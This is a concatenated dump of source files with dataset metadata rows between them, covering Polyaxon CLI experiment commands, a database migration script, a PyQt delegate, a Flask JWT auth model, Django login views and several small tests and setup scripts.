$ polyaxon experiment --experiment=1 restart
```
"""
config = None
update_code = None
if file:
config = rhea.read(file)
# Check if we need to upload
if u:
ctx.invoke(upload, sync=False)
update_code = True
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
if copy:
response = PolyaxonClient().experiment.copy(
user, project_name, _experiment, config=config, update_code=update_code)
Printer.print_success('Experiment was copied with id {}'.format(response.id))
else:
response = PolyaxonClient().experiment.restart(
user, project_name, _experiment, config=config, update_code=update_code)
Printer.print_success('Experiment was restarted with id {}'.format(response.id))
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not restart experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
@experiment.command()
@click.option('--file', '-f', multiple=True, type=click.Path(exists=True),
help="The polyaxon files to update with.")
@click.option('-u', is_flag=True, default=False,
help="To upload the repo before resuming.")
@click.pass_context
@clean_outputs
def resume(ctx, file, u): # pylint:disable=redefined-builtin
"""Resume experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment --experiment=1 resume
```
"""
config = None
update_code = None
if file:
config = rhea.read(file)
# Check if we need to upload
if u:
ctx.invoke(upload, sync=False)
update_code = True
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
response = PolyaxonClient().experiment.resume(
user, project_name, _experiment, config=config, update_code=update_code)
Printer.print_success('Experiment was resumed with id {}'.format(response.id))
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not resume experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
@experiment.command()
@click.option('--page', type=int, help="To paginate through the list of jobs.")
@click.pass_context
@clean_outputs
def jobs(ctx, page):
"""List jobs for experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment --experiment=1 jobs
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
page = page or 1
try:
response = PolyaxonClient().experiment.list_jobs(
user, project_name, _experiment, page=page)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get jobs for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
meta = get_meta_response(response)
if meta:
Printer.print_header('Jobs for experiment `{}`.'.format(_experiment))
Printer.print_header('Navigation:')
dict_tabulate(meta)
else:
Printer.print_header('No jobs found for experiment `{}`.'.format(_experiment))
objects = [Printer.add_status_color(o.to_light_dict(humanize_values=True))
for o in response['results']]
objects = list_dicts_to_tabulate(objects)
if objects:
Printer.print_header("Jobs:")
objects.pop('experiment', None)
dict_tabulate(objects, is_list_dict=True)
@experiment.command()
@click.option('--job', '-j', type=int, help="The job id.")
@click.option('--page', type=int, help="To paginate through the list of statuses.")
@click.pass_context
@clean_outputs
def statuses(ctx, job, page):
"""Get experiment or experiment job statuses.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples getting experiment statuses:
\b
```bash
$ polyaxon experiment statuses
```
\b
```bash
$ polyaxon experiment -xp 1 statuses
```
Examples getting experiment job statuses:
\b
```bash
$ polyaxon experiment statuses -j 3
```
\b
```bash
$ polyaxon experiment -xp 1 statuses --job 1
```
"""
def get_experiment_statuses():
try:
response = PolyaxonClient().experiment.get_statuses(
user, project_name, _experiment, page=page)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get status for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
meta = get_meta_response(response)
if meta:
Printer.print_header('Statuses for experiment `{}`.'.format(_experiment))
Printer.print_header('Navigation:')
dict_tabulate(meta)
else:
Printer.print_header('No statuses found for experiment `{}`.'.format(_experiment))
objects = list_dicts_to_tabulate(
[Printer.add_status_color(o.to_light_dict(humanize_values=True), status_key='status')
for o in response['results']])
if objects:
Printer.print_header("Statuses:")
objects.pop('experiment', None)
dict_tabulate(objects, is_list_dict=True)
def get_experiment_job_statuses():
try:
response = PolyaxonClient().experiment_job.get_statuses(user,
project_name,
_experiment,
_job,
page=page)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get status for job `{}`.'.format(job))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
meta = get_meta_response(response)
if meta:
Printer.print_header('Statuses for Job `{}`.'.format(_job))
Printer.print_header('Navigation:')
dict_tabulate(meta)
else:
Printer.print_header('No statuses found for job `{}`.'.format(_job))
objects = list_dicts_to_tabulate(
[Printer.add_status_color(o.to_light_dict(humanize_values=True), status_key='status')
for o in response['results']])
if objects:
Printer.print_header("Statuses:")
objects.pop('job', None)
dict_tabulate(objects, is_list_dict=True)
page = page or 1
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if job:
_job = get_experiment_job_or_local(job)
get_experiment_job_statuses()
else:
get_experiment_statuses()
@experiment.command()
@click.option('--job', '-j', type=int, help="The job id.")
@click.option('--gpu', '-g', is_flag=True, help="List experiment GPU resources.")
@click.pass_context
@clean_outputs
def resources(ctx, job, gpu):
"""Get experiment or experiment job resources.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples for getting experiment resources:
\b
```bash
$ polyaxon experiment -xp 19 resources
```
For GPU resources
\b
```bash
$ polyaxon experiment -xp 19 resources --gpu
```
Examples for getting experiment job resources:
\b
```bash
$ polyaxon experiment -xp 19 resources -j 1
```
For GPU resources
\b
```bash
$ polyaxon experiment -xp 19 resources -j 1 --gpu
```
"""
def get_experiment_resources():
try:
message_handler = Printer.gpu_resources if gpu else Printer.resources
PolyaxonClient().experiment.resources(
user, project_name, _experiment, message_handler=message_handler)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get resources for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
def get_experiment_job_resources():
try:
message_handler = Printer.gpu_resources if gpu else Printer.resources
PolyaxonClient().experiment_job.resources(user,
project_name,
_experiment,
_job,
message_handler=message_handler)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get resources for job `{}`.'.format(_job))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if job:
_job = get_experiment_job_or_local(job)
get_experiment_job_resources()
else:
get_experiment_resources()
@experiment.command()
@click.option('--job', '-j', type=int, help="The job id.")
@click.option('--past', '-p', is_flag=True, help="Show the past logs.")
@click.option('--follow', '-f', is_flag=True, default=False,
help="Stream logs after showing past logs.")
@click.option('--hide_time', is_flag=True, default=False,
help="Whether or not to hide timestamps from the log stream.")
@click.pass_context
@clean_outputs
def logs(ctx, job, past, follow, hide_time):
"""Get experiment or experiment job logs.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples for getting experiment logs:
\b
```bash
$ polyaxon experiment logs
```
\b
```bash
$ polyaxon experiment -xp 10 -p mnist logs
```
Examples for getting experiment job logs:
\b
```bash
$ polyaxon experiment -xp 1 -j 1 logs
```
"""
def get_experiment_logs():
if past:
try:
response = PolyaxonClient().experiment.logs(
user, project_name, _experiment, stream=False)
get_logs_handler(handle_job_info=True,
show_timestamp=not hide_time,
stream=False)(response.content.decode().split('\n'))
print()
if not follow:
return
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
if not follow:
Printer.print_error(
'Could not get logs for experiment `{}`.'.format(_experiment))
Printer.print_error(
'Error message `{}`.'.format(e))
sys.exit(1)
try:
PolyaxonClient().experiment.logs(
user,
project_name,
_experiment,
message_handler=get_logs_handler(handle_job_info=True,
show_timestamp=not hide_time))
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get logs for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
def get_experiment_job_logs():
if past:
try:
response = PolyaxonClient().experiment_job.logs(
user,
project_name,
_experiment,
_job,
stream=False)
get_logs_handler(handle_job_info=True,
show_timestamp=not hide_time,
stream=False)(response.content.decode().split('\n'))
print()
if not follow:
return
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
if not follow:
Printer.print_error(
'Could not get logs for experiment `{}`.'.format(_experiment))
Printer.print_error(
'Error message `{}`.'.format(e))
sys.exit(1)
try:
PolyaxonClient().experiment_job.logs(
user,
project_name,
_experiment,
_job,
message_handler=get_logs_handler(handle_job_info=True,
show_timestamp=not hide_time))
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get logs for job `{}`.'.format(_job))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if job:
_job = get_experiment_job_or_local(job)
get_experiment_job_logs()
else:
get_experiment_logs()
@experiment.command()
@click.pass_context
@clean_outputs
def outputs(ctx):
"""Download outputs for experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment -xp 1 outputs
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
PolyaxonClient().experiment.download_outputs(user, project_name, _experiment)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not download outputs for experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success('Files downloaded.')
@experiment.command()
@click.pass_context
@clean_outputs
def bookmark(ctx):
"""Bookmark experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment bookmark
```
\b
```bash
$ polyaxon experiment -xp 2 bookmark
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
PolyaxonClient().experiment.bookmark(user, project_name, _experiment)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not bookmark experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success("Experiment is bookmarked.")
@experiment.command()
@click.pass_context
@clean_outputs
def unbookmark(ctx):
"""Unbookmark experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment unbookmark
```
\b
```bash
$ polyaxon experiment -xp 2 unbookmark
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
try:
PolyaxonClient().experiment.unbookmark(user, project_name, _experiment)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not unbookmark experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success("Experiment is unbookmarked.")
| 33.84807 | 99 | 0.606659 | 2,827 | 27,180 | 5.659356 | 0.089848 | 0.048753 | 0.040378 | 0.051566 | 0.768986 | 0.705607 | 0.636852 | 0.606163 | 0.585349 | 0.570286 | 0 | 0.003379 | 0.281347 | 27,180 | 802 | 100 | 33.890274 | 0.815697 | 0.134106 | 0 | 0.587473 | 0 | 0 | 0.14221 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049676 | false | 0.030238 | 0.034557 | 0 | 0.088553 | 0.146868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c88b8dca0946deb62b53070c85ee8a8bd47974e
| 845 |
py
|
Python
|
initial_load.py
|
hongyuanChrisLi/RealEstateDBConvert
|
0fd04f5213ff3fd3548db3f322828bd80cf41791
|
[
"Apache-2.0"
] | null | null | null |
initial_load.py
|
hongyuanChrisLi/RealEstateDBConvert
|
0fd04f5213ff3fd3548db3f322828bd80cf41791
|
[
"Apache-2.0"
] | null | null | null |
initial_load.py
|
hongyuanChrisLi/RealEstateDBConvert
|
0fd04f5213ff3fd3548db3f322828bd80cf41791
|
[
"Apache-2.0"
] | null | null | null |
from mysql_dao.select_dao import SelectDao as MysqlSelectDao
from postgres_dao.ddl_dao import DdlDao
from postgres_dao.dml_dao import DmlDao as PsqlDmlDao
psql_ddl_dao = DdlDao()
mysql_select_dao = MysqlSelectDao()
psql_dml_dao = PsqlDmlDao()
psql_ddl_dao.create_tables()
county_data = mysql_select_dao.select_all_counties()
psql_dml_dao.insert_county(county_data)
city_data = mysql_select_dao.select_all_cities()
psql_dml_dao.insert_city(city_data)
zipcode_data = mysql_select_dao.select_all_zipcodes()
psql_dml_dao.insert_zipcode(zipcode_data)
data = mysql_select_dao.select_full_addr_month_rpt()
psql_dml_dao.trunc_addr_month_rpt()
psql_dml_dao.insert_addr_month_rpt(data)
data = mysql_select_dao.select_full_mls_daily_rpt()
psql_dml_dao.trunc_mls_rpt()
psql_dml_dao.insert_mls_rpt(data)
mysql_select_dao.close()
psql_dml_dao.close()
| 28.166667 | 60 | 0.857988 | 141 | 845 | 4.602837 | 0.241135 | 0.09245 | 0.138675 | 0.16641 | 0.365177 | 0.291217 | 0.098613 | 0 | 0 | 0 | 0 | 0 | 0.068639 | 845 | 29 | 61 | 29.137931 | 0.824651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c8e9965cc893f149c68d0938c7cdd288fb5e3a7
| 980 |
py
|
Python
|
src/urh/ui/delegates/CheckBoxDelegate.py
|
awesome-archive/urh
|
c8c3aabc9d637ca660d8c72c3d8372055e0f3ec7
|
[
"Apache-2.0"
] | 1 |
2017-06-21T02:37:16.000Z
|
2017-06-21T02:37:16.000Z
|
src/urh/ui/delegates/CheckBoxDelegate.py
|
dspmandavid/urh
|
30643c1a68634b1c97eb9989485a4e96a3b038ae
|
[
"Apache-2.0"
] | null | null | null |
src/urh/ui/delegates/CheckBoxDelegate.py
|
dspmandavid/urh
|
30643c1a68634b1c97eb9989485a4e96a3b038ae
|
[
"Apache-2.0"
] | null | null | null |
from PyQt5.QtCore import QModelIndex, QAbstractItemModel, Qt, pyqtSlot
from PyQt5.QtWidgets import QItemDelegate, QWidget, QStyleOptionViewItem, QCheckBox
class CheckBoxDelegate(QItemDelegate):
def __init__(self, parent=None):
super().__init__(parent)
self.enabled = True
def createEditor(self, parent: QWidget, option: QStyleOptionViewItem, index: QModelIndex):
editor = QCheckBox(parent)
editor.stateChanged.connect(self.stateChanged)
return editor
def setEditorData(self, editor: QCheckBox, index: QModelIndex):
editor.blockSignals(True)
editor.setChecked(index.model().data(index))
self.enabled = editor.isChecked()
editor.blockSignals(False)
def setModelData(self, editor: QCheckBox, model: QAbstractItemModel, index: QModelIndex):
model.setData(index, editor.isChecked(), Qt.EditRole)
@pyqtSlot()
def stateChanged(self):
self.commitData.emit(self.sender())
| 37.692308 | 94 | 0.715306 | 97 | 980 | 7.14433 | 0.443299 | 0.069264 | 0.063492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002503 | 0.184694 | 980 | 26 | 95 | 37.692308 | 0.864831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.1 | 0 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c9666a6d0704c6c5a1d15ed10e9ce79d7670676
| 3,215 |
py
|
Python
|
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
# project/server/models.py
import jwt
import datetime
from project.server import app, db, bcrypt
class User(db.Model):
""" User Model for storing user related details """
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(255), unique=True, nullable=False)
email = db.Column(db.String(255), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
name = db.Column(db.String(255), nullable=False)
age = db.Column(db.Integer, nullable=False)
address = db.Column(db.String(255), nullable=False)
registered_on = db.Column(db.DateTime, nullable=False)
admin = db.Column(db.Boolean, nullable=False, default=False)
def __init__(self, email, username, password, name, age, address, admin=False):
self.email = email
self.username = username
self.password = bcrypt.generate_password_hash(
password, app.config.get('BCRYPT_LOG_ROUNDS')
).decode()
self.name = name
self.age = age
self.address = address
self.registered_on = datetime.datetime.now()
self.admin = admin
def encode_auth_token(self, user_id):
"""
Generates the Auth Token
:return: string
"""
try:
payload = {
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=0, seconds=5),
'iat': datetime.datetime.utcnow(),
'sub': user_id
}
return jwt.encode(
payload,
app.config.get('SECRET_KEY'),
algorithm='HS256'
)
except Exception as e:
return e
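# Illustrative round trip (hypothetical user instance):
#   token = user.encode_auth_token(user.id)
#   User.decode_auth_token(token)  # -> user.id, unless expired or blacklisted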
@staticmethod
def decode_auth_token(auth_token):
"""
Validates the auth token
:param auth_token:
:return: integer|string
"""
try:
payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'))
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
class BlacklistToken(db.Model):
"""
Token Model for storing JWT tokens
"""
__tablename__ = 'blacklist_tokens'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
token = db.Column(db.String(500), unique=True, nullable=False)
blacklisted_on = db.Column(db.DateTime, nullable=False)
def __init__(self, token):
self.token = token
self.blacklisted_on = datetime.datetime.now()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
# Check whether auth token has been blacklisted
res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
if res:
return True
else:
return False
| 32.806122 | 90 | 0.612753 | 368 | 3,215 | 5.211957 | 0.296196 | 0.050052 | 0.062565 | 0.04171 | 0.18561 | 0.163712 | 0.163712 | 0.095933 | 0.095933 | 0.052138 | 0 | 0.009961 | 0.281804 | 3,215 | 97 | 91 | 33.14433 | 0.820702 | 0.080871 | 0 | 0.115942 | 0 | 0 | 0.07058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.057971 | 0.043478 | 0.014493 | 0.492754 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7ca33bba047d555eff412922059b6da8837f7980
| 270 |
py
|
Python
|
examples/setuptools-rust-starter/tests/test_setuptools_rust_starter.py
|
FriendRat/pyo3
|
5446fe2062cb3bf11bf61bd4a2c58a7ed8b408d2
|
[
"Apache-2.0"
] | 1 |
2021-06-18T16:27:31.000Z
|
2021-06-18T16:27:31.000Z
|
examples/setuptools-rust-starter/tests/test_setuptools_rust_starter.py
|
FriendRat/pyo3
|
5446fe2062cb3bf11bf61bd4a2c58a7ed8b408d2
|
[
"Apache-2.0"
] | 5 |
2021-11-08T22:05:41.000Z
|
2022-03-28T22:07:04.000Z
|
examples/setuptools-rust-starter/tests/test_setuptools_rust_starter.py
|
FriendRat/pyo3
|
5446fe2062cb3bf11bf61bd4a2c58a7ed8b408d2
|
[
"Apache-2.0"
] | null | null | null |
from setuptools_rust_starter import PythonClass, ExampleClass
def test_python_class() -> None:
py_class = PythonClass(value=10)
assert py_class.value == 10
def test_example_class() -> None:
example = ExampleClass(value=11)
assert example.value == 11
| 22.5 | 61 | 0.733333 | 35 | 270 | 5.428571 | 0.514286 | 0.073684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035874 | 0.174074 | 270 | 11 | 62 | 24.545455 | 0.816144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 1 | 0.285714 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7caf56de8045038d74971a889dbed39c31d7bb50
| 1,306 |
py
|
Python
|
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
BReduardokramer/gaia
|
c00302cdcd435ab193e8365917cfc6abac9e4f2e
|
[
"Apache-2.0"
] | 1 |
2021-11-09T00:27:34.000Z
|
2021-11-09T00:27:34.000Z
|
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
AmyYLee/gaia
|
a5dbae8235163d7f985bdeb7d649268f02749a8b
|
[
"Apache-2.0"
] | null | null | null |
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
AmyYLee/gaia
|
a5dbae8235163d7f985bdeb7d649268f02749a8b
|
[
"Apache-2.0"
] | null | null | null |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from gaiatest import GaiaTestCase
from gaiatest.apps.lockscreen.app import LockScreen
class TestCameraUnlockWithPasscode(GaiaTestCase):
# Input data
_input_passcode = '7931'
def setUp(self):
GaiaTestCase.setUp(self)
# Turn off geolocation prompt
self.apps.set_permission('System', 'geolocation', 'deny')
self.data_layer.set_setting('lockscreen.passcode-lock.code', self._input_passcode)
self.data_layer.set_setting('lockscreen.passcode-lock.enabled', True)
# this time we need it locked!
self.lockscreen.lock()
self.lock_screen = LockScreen(self.marionette)
def test_unlock_to_camera_with_passcode(self):
# https://github.com/mozilla/gaia-ui-tests/issues/479
camera = self.lock_screen.unlock_to_camera()
self.lock_screen.wait_for_lockscreen_not_visible()
camera.switch_to_camera_frame()
self.assertFalse(camera.is_gallery_button_visible)
camera.tap_switch_source()
camera.wait_for_capture_ready()
self.assertFalse(camera.is_gallery_button_visible)
| 31.095238 | 90 | 0.717458 | 173 | 1,306 | 5.202312 | 0.520231 | 0.026667 | 0.046667 | 0.035556 | 0.195556 | 0.195556 | 0.195556 | 0.1 | 0 | 0 | 0 | 0.010427 | 0.19219 | 1,306 | 41 | 91 | 31.853659 | 0.842654 | 0.238897 | 0 | 0.105263 | 0 | 0 | 0.087221 | 0.061866 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.105263 | false | 0.263158 | 0.105263 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7cb2d3d2cb22c43c3c911d744e22c33bc37cdf49
| 1,661 |
py
|
Python
|
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, render_to_response, redirect
from django.contrib import auth
from django.contrib.auth.forms import UserCreationForm
from django.template.context_processors import csrf
from django.http import HttpResponseRedirect
def login(request):
args = {}
args.update(csrf(request))
if request.POST:
username = request.POST.get('username')
password = request.POST.get('password')
user = auth.authenticate(username=username, password=password)
if user is not None:
auth.login(request, user)
return redirect('/main')
else:
args['login_error'] = "Пользователь не найден или пароль введен неверный пароль"
return render_to_response('login.html', args)
else:
return render_to_response('login.html', args)
def reg(request):
auth.logout(request)
error = ''
if request.method == "POST":
newuser_form = UserCreationForm(data = request.POST)
if newuser_form.is_valid():
newuser_form.save()
newuser = auth.authenticate(username = newuser_form.cleaned_data['username'], password = newuser_form.cleaned_data['password1'])
auth.login(request, newuser)
return redirect('/main')
else:
            error = 'Please check that the data you entered is correct.'
else:
newuser_form = UserCreationForm()
    return render(request, 'reg.html', locals())
def main(request):
return render(request, 'index.html', {'username': auth.get_user(request).username} )
def logout(request):
auth.logout(request)
return HttpResponseRedirect("/login")
| 31.339623 | 140 | 0.668874 | 186 | 1,661 | 5.876344 | 0.327957 | 0.060384 | 0.043916 | 0.040256 | 0.064044 | 0.064044 | 0.064044 | 0 | 0 | 0 | 0 | 0.000777 | 0.225166 | 1,661 | 52 | 141 | 31.942308 | 0.848485 | 0 | 0 | 0.25 | 0 | 0 | 0.123494 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.075 | 0.125 | 0.025 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7cb5817de3a17f08a3afdfbe15a3bbd0fbe2d1d8
| 346 |
py
|
Python
|
setup.py
|
GeorgeDittmar/MarkovTextGenerator
|
df6a56e23051e1f263ba22889dc3b5d0dc03e370
|
[
"Apache-2.0"
] | 1 |
2021-11-26T15:49:31.000Z
|
2021-11-26T15:49:31.000Z
|
setup.py
|
GeorgeDittmar/Mimic
|
df6a56e23051e1f263ba22889dc3b5d0dc03e370
|
[
"Apache-2.0"
] | 1 |
2019-06-24T17:30:41.000Z
|
2019-06-26T04:53:00.000Z
|
setup.py
|
GeorgeDittmar/MarkovTextGenerator
|
df6a56e23051e1f263ba22889dc3b5d0dc03e370
|
[
"Apache-2.0"
] | 2 |
2020-05-04T07:57:17.000Z
|
2021-02-23T05:10:11.000Z
|
#!/usr/bin/env python
from distutils.core import setup
setup(name='Mimik',
version='1.0',
description='Python framework for markov models',
author='George Dittmar',
author_email='georgedittmar@gmail.com',
url='https://www.python.org/sigs/distutils-sig/',
      # NOTE: this packages list mirrors the distutils documentation example;
      # it most likely should name this project's own packages instead.
      packages=['distutils', 'distutils.command'],
)
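# Hedged usage note: with distutils, a script like this is typically driven
# from the command line, e.g. `python setup.py sdist` to build a source
# distribution or `python setup.py install` to install the package.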
| 26.615385 | 55 | 0.65896 | 41 | 346 | 5.536585 | 0.829268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007092 | 0.184971 | 346 | 12 | 56 | 28.833333 | 0.797872 | 0.057803 | 0 | 0 | 0 | 0 | 0.452308 | 0.070769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cb6009fc34f03127073ead641d466f1b2a5c978
| 2,313 |
py
|
Python
|
app/search/hot_eval/hl_reportable.py
|
don4apaev/anfisa
|
2e4bdd83c584c0000f037413ccc1f9067c07fa70
|
[
"Apache-2.0"
] | null | null | null |
app/search/hot_eval/hl_reportable.py
|
don4apaev/anfisa
|
2e4bdd83c584c0000f037413ccc1f9067c07fa70
|
[
"Apache-2.0"
] | null | null | null |
app/search/hot_eval/hl_reportable.py
|
don4apaev/anfisa
|
2e4bdd83c584c0000f037413ccc1f9067c07fa70
|
[
"Apache-2.0"
] | null | null | null |
def evalRec(env, rec):
